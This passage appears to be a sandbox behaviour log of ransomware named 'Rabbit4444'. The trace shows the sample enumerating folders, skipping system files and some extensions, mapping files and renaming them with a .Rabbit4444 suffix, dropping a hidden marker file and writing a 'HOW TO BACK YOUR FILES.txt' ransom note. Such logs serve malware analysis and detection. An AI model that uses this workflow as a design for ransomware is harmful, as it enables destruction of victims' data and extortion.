0x108bc8 [0047.837] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0047.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.837] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0047.837] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.837] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0047.837] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13914803979) returned 1 [0047.837] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0047.837] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0047.837] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.838] CloseHandle (hObject=0x298) returned 1 [0047.838] CloseHandle (hObject=0x278) returned 1 [0047.839] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\amd64\\hwexclude.txt.Rabbit4444") returned 60 [0047.839] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\amd64\\hwexclude.txt" (normalized: "c:\\windows10upgrade\\resources\\amd64\\hwexclude.txt"), lpNewFileName="C:\\Windows10Upgrade\\resources\\amd64\\hwexclude.txt.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\amd64\\hwexclude.txt.rabbit4444"), dwFlags=0x1) returned 1 [0047.839] InterlockedExchangeAdd (in: Addend=0xff618, Value=2320 | out: Addend=0xff618) returned 15194016 [0047.839] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3297 [0047.839] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea39eff9, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea39eff9, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x26b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nxquery.cat", cAlternateFileName="")) returned 1 [0047.840] lstrcmpiW (lpString1="nxquery.cat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.840] lstrcmpiW (lpString1="nxquery.cat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.840] lstrcmpiW (lpString1="nxquery.cat", lpString2="Rabbit4444.exe") returned -1 [0047.840] lstrcmpiW (lpString1="nxquery.cat", lpString2=".") returned 1 [0047.840] lstrcmpiW (lpString1="nxquery.cat", lpString2="..") returned 1 [0047.840] lstrcmpiW (lpString1="nxquery.cat", lpString2="windows") returned -1 [0047.840] lstrcmpiW (lpString1="nxquery.cat", lpString2="bootmgr") returned 1 [0047.840] lstrcmpiW (lpString1="nxquery.cat", lpString2="pagefile.sys") returned -1 [0047.840] lstrcmpiW (lpString1="nxquery.cat", lpString2="boot") returned 1 [0047.840] lstrcmpiW (lpString1="nxquery.cat", lpString2="ids.txt") returned 1 [0047.840] lstrcmpiW (lpString1="nxquery.cat", lpString2="NTUSER.DAT") returned 1 [0047.840] lstrcpyW (in: lpString1=0x130eb80, lpString2="nxquery.cat" | out: lpString1="nxquery.cat") returned="nxquery.cat" [0047.840] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\nxquery.cat", dwFileAttributes=0x0) returned 1 [0047.840] lstrlenW (lpString="nxquery.cat") returned 11 [0047.840] lstrlenW (lpString="Rabbit4444") returned 10 [0047.840] lstrcmpiW (lpString1="xquery.cat", lpString2="Rabbit4444") returned 1 [0047.840] lstrlenW (lpString=".dll") returned 4 [0047.840] lstrcmpiW (lpString1=".cat", lpString2=".dll") returned -1 [0047.840] lstrlenW (lpString=".lnk") returned 4 [0047.840] lstrcmpiW (lpString1=".cat", lpString2=".lnk") returned -1 [0047.840] lstrlenW (lpString=".ini") returned 4 [0047.840] lstrcmpiW (lpString1=".cat", lpString2=".ini") returned -1 [0047.840] lstrlenW (lpString=".sys") returned 4 [0047.841] lstrcmpiW (lpString1=".cat", lpString2=".sys") returned -1 [0047.841] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\nxquery.cat" (normalized: "c:\\windows10upgrade\\resources\\amd64\\nxquery.cat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.841] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.841] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13915147047) returned 1 [0047.841] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=9910) returned 1 [0047.841] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0047.841] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0047.841] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x29c0, lpName=0x0) returned 0x298 [0047.842] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x29c0) returned 0x70000 [0047.844] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.844] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0047.844] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.844] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0047.844] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.844] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0047.844] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.844] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0047.844] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13915477179) returned 1 [0047.844] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0047.844] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0047.844] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.844] CloseHandle (hObject=0x298) returned 1 [0047.844] CloseHandle (hObject=0x278) returned 1 [0047.846] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\amd64\\nxquery.cat.Rabbit4444") returned 58 [0047.846] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\amd64\\nxquery.cat" (normalized: "c:\\windows10upgrade\\resources\\amd64\\nxquery.cat"), lpNewFileName="C:\\Windows10Upgrade\\resources\\amd64\\nxquery.cat.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\amd64\\nxquery.cat.rabbit4444"), dwFlags=0x1) returned 1 [0047.846] InterlockedExchangeAdd (in: Addend=0xff618, Value=9920 | out: Addend=0xff618) returned 15196336 [0047.846] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3300 [0047.846] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3a3e27, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3a3e27, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x5d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nxquery.inf", cAlternateFileName="")) returned 1 [0047.846] lstrcmpiW (lpString1="nxquery.inf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.846] lstrcmpiW (lpString1="nxquery.inf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.846] lstrcmpiW (lpString1="nxquery.inf", lpString2="Rabbit4444.exe") returned -1 [0047.846] lstrcmpiW (lpString1="nxquery.inf", lpString2=".") returned 1 [0047.847] lstrcmpiW (lpString1="nxquery.inf", lpString2="..") returned 1 [0047.847] lstrcmpiW (lpString1="nxquery.inf", lpString2="windows") returned -1 [0047.847] lstrcmpiW (lpString1="nxquery.inf", lpString2="bootmgr") returned 1 [0047.847] lstrcmpiW (lpString1="nxquery.inf", lpString2="pagefile.sys") returned -1 [0047.847] lstrcmpiW (lpString1="nxquery.inf", lpString2="boot") returned 1 [0047.847] lstrcmpiW (lpString1="nxquery.inf", lpString2="ids.txt") returned 1 [0047.847] lstrcmpiW (lpString1="nxquery.inf", lpString2="NTUSER.DAT") returned 1 [0047.847] lstrcpyW (in: lpString1=0x130eb80, lpString2="nxquery.inf" | out: lpString1="nxquery.inf") returned="nxquery.inf" [0047.847] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\nxquery.inf", dwFileAttributes=0x0) returned 1 [0047.847] lstrlenW (lpString="nxquery.inf") returned 11 [0047.847] lstrlenW (lpString="Rabbit4444") returned 10 [0047.847] lstrcmpiW (lpString1="xquery.inf", lpString2="Rabbit4444") returned 1 [0047.847] lstrlenW (lpString=".dll") returned 4 [0047.847] lstrcmpiW (lpString1=".inf", lpString2=".dll") returned 1 [0047.847] lstrlenW (lpString=".lnk") returned 4 [0047.847] lstrcmpiW (lpString1=".inf", lpString2=".lnk") returned -1 [0047.847] lstrlenW (lpString=".ini") returned 4 [0047.847] lstrcmpiW (lpString1=".inf", lpString2=".ini") returned -1 [0047.847] lstrlenW (lpString=".sys") returned 4 [0047.847] lstrcmpiW (lpString1=".inf", lpString2=".sys") returned -1 [0047.848] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\nxquery.inf" (normalized: "c:\\windows10upgrade\\resources\\amd64\\nxquery.inf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.848] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.848] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13915840920) returned 1 [0047.848] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1495) returned 1 [0047.848] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0047.848] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0047.848] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8e0, lpName=0x0) returned 0x298 [0047.849] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8e0) returned 0x70000 [0047.850] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.850] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0047.850] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.850] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0047.850] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.851] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0047.851] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.851] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0047.851] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13916140717) returned 1 [0047.851] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0047.851] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0047.851] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.851] CloseHandle (hObject=0x298) returned 1 [0047.851] CloseHandle (hObject=0x278) returned 1 [0047.852] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\amd64\\nxquery.inf.Rabbit4444") returned 58 [0047.853] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\amd64\\nxquery.inf" (normalized: "c:\\windows10upgrade\\resources\\amd64\\nxquery.inf"), lpNewFileName="C:\\Windows10Upgrade\\resources\\amd64\\nxquery.inf.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\amd64\\nxquery.inf.rabbit4444"), dwFlags=0x1) returned 1 [0047.853] InterlockedExchangeAdd (in: Addend=0xff618, Value=1504 | out: Addend=0xff618) returned 15206256 [0047.853] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3303 [0047.853] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3a652e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3a652e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x50b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NXQuery.sys", cAlternateFileName="")) returned 1 [0047.853] lstrcmpiW (lpString1="NXQuery.sys", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.853] lstrcmpiW (lpString1="NXQuery.sys", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.853] lstrcmpiW (lpString1="NXQuery.sys", lpString2="Rabbit4444.exe") returned -1 [0047.853] lstrcmpiW (lpString1="NXQuery.sys", lpString2=".") returned 1 [0047.853] lstrcmpiW (lpString1="NXQuery.sys", lpString2="..") returned 1 [0047.853] lstrcmpiW (lpString1="NXQuery.sys", lpString2="windows") returned -1 [0047.853] lstrcmpiW (lpString1="NXQuery.sys", lpString2="bootmgr") returned 1 [0047.853] lstrcmpiW (lpString1="NXQuery.sys", lpString2="pagefile.sys") returned -1 [0047.853] lstrcmpiW (lpString1="NXQuery.sys", lpString2="boot") returned 1 [0047.853] lstrcmpiW (lpString1="NXQuery.sys", lpString2="ids.txt") returned 1 [0047.853] lstrcmpiW (lpString1="NXQuery.sys", lpString2="NTUSER.DAT") returned 1 [0047.853] lstrcpyW (in: lpString1=0x130eb80, lpString2="NXQuery.sys" | out: lpString1="NXQuery.sys") returned="NXQuery.sys" [0047.853] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\NXQuery.sys", dwFileAttributes=0x0) returned 1 [0047.854] lstrlenW (lpString="NXQuery.sys") returned 11 [0047.854] lstrlenW (lpString="Rabbit4444") returned 10 [0047.854] lstrcmpiW (lpString1="XQuery.sys", lpString2="Rabbit4444") returned 1 [0047.854] lstrlenW (lpString=".dll") returned 4 [0047.854] lstrcmpiW (lpString1=".sys", lpString2=".dll") returned 1 [0047.854] lstrlenW (lpString=".lnk") returned 4 [0047.854] lstrcmpiW (lpString1=".sys", lpString2=".lnk") returned 1 [0047.854] lstrlenW (lpString=".ini") returned 4 [0047.854] lstrcmpiW (lpString1=".sys", lpString2=".ini") returned 1 [0047.854] lstrlenW (lpString=".sys") returned 4 [0047.854] lstrcmpiW (lpString1=".sys", lpString2=".sys") returned 0 [0047.854] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3a652e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3a652e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x50b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NXQuery.sys", cAlternateFileName="")) returned 0 [0047.854] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0047.854] lstrcpyW (in: lpString1=0x130eb80, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0047.854] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\resources\\amd64\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0047.855] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0047.858] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0047.859] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.859] CloseHandle (hObject=0x278) returned 1 [0047.859] CloseHandle (hObject=0x27c) returned 1 [0047.860] GetCurrentThreadId () returned 0xd98 [0047.860] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6570 [0047.860] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Windows10Upgrade\\dll2", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\dll2") returned="C:\\Windows10Upgrade\\dll2" [0047.860] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102990 | out: hHeap=0xe0000) returned 1 [0047.860] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6568 | out: hHeap=0xe0000) returned 1 [0047.860] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\dll2" | out: lpString1="C:\\Windows10Upgrade\\dll2") returned="C:\\Windows10Upgrade\\dll2" [0047.860] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\dll2", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\dll2\\") returned="C:\\Windows10Upgrade\\dll2\\" [0047.860] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\dll2\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\dll2\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\dll2\\.BFC0E91B00AE8A0620D3" [0047.860] CreateFileW (lpFileName="C:\\Windows10Upgrade\\dll2\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\dll2\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0047.862] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0047.864] FlushFileBuffers (hFile=0x27c) returned 1 [0047.865] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\dll2\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0047.865] CloseHandle (hObject=0x27c) returned 1 [0047.866] lstrlenW (lpString="C:\\Windows10Upgrade\\dll2") returned 24 [0047.866] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0047.866] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\dll2\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea37cd05, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea37cd05, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe5da6383, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0047.866] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.866] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.866] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0047.866] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0047.866] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea37cd05, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea37cd05, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe5da6383, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.866] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.866] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.866] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0047.866] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0047.866] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0047.866] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe5da6383, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe5da6383, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe5da6383, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0047.866] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.866] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0047.866] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea37e09b, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea37e09b, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xb8400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="webservices.dll", cAlternateFileName="WEBSER~1.DLL")) returned 1 [0047.866] lstrcmpiW (lpString1="webservices.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.866] lstrcmpiW (lpString1="webservices.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.866] lstrcmpiW (lpString1="webservices.dll", lpString2="Rabbit4444.exe") returned 1 [0047.866] lstrcmpiW (lpString1="webservices.dll", lpString2=".") returned 1 [0047.866] lstrcmpiW (lpString1="webservices.dll", lpString2="..") returned 1 [0047.866] lstrcmpiW (lpString1="webservices.dll", lpString2="windows") returned -1 [0047.866] lstrcmpiW (lpString1="webservices.dll", lpString2="bootmgr") returned 1 [0047.866] lstrcmpiW (lpString1="webservices.dll", lpString2="pagefile.sys") returned 1 [0047.866] lstrcmpiW (lpString1="webservices.dll", lpString2="boot") returned 1 [0047.866] lstrcmpiW (lpString1="webservices.dll", lpString2="ids.txt") returned 1 [0047.867] lstrcmpiW (lpString1="webservices.dll", lpString2="NTUSER.DAT") returned 1 [0047.867] lstrcpyW (in: lpString1=0x130eb6a, lpString2="webservices.dll" | out: lpString1="webservices.dll") returned="webservices.dll" [0047.867] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\dll2\\webservices.dll", dwFileAttributes=0x0) returned 1 [0047.867] lstrlenW (lpString="webservices.dll") returned 15 [0047.867] lstrlenW (lpString="Rabbit4444") returned 10 [0047.867] lstrcmpiW (lpString1="rvices.dll", lpString2="Rabbit4444") returned 1 [0047.867] lstrlenW (lpString=".dll") returned 4 [0047.867] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0047.867] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea37e09b, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea37e09b, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xb8400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="webservices.dll", cAlternateFileName="WEBSER~1.DLL")) returned 0 [0047.867] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0047.867] lstrcpyW (in: lpString1=0x130eb6a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0047.867] CreateFileW (lpFileName="C:\\Windows10Upgrade\\dll2\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\dll2\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0047.869] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0047.869] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0047.869] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.869] CloseHandle (hObject=0x278) returned 1 [0047.869] CloseHandle (hObject=0x27c) returned 1 [0047.870] GetCurrentThreadId () returned 0xd98 [0047.870] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6510 [0047.870] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Windows10Upgrade\\2052", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\2052") returned="C:\\Windows10Upgrade\\2052" [0047.870] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102510 | out: hHeap=0xe0000) returned 1 [0047.870] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6508 | out: hHeap=0xe0000) returned 1 [0047.870] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\2052" | out: lpString1="C:\\Windows10Upgrade\\2052") returned="C:\\Windows10Upgrade\\2052" [0047.870] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\2052", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\2052\\") 